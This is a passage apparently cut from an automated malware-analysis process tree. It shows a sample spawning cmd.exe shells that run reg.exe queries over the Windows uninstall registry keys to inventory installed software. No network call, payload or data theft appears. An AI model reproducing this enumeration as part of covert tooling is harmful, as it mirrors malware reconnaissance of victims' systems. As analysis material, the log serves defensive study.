C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:2528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:2544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2556
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:2568
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:2580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2596
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:2608
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:2620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2648
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:2660
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2676
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:2688
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:2704
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2716
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:2732
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:2744
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2760
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:2772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:2788
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2800
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:2812
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:2832
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2864
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:2892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:2904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2916
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:2928
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:2948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:2972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:2984
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2996
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:3016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:3032
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:3060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1716
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:2256
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:976
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1980
-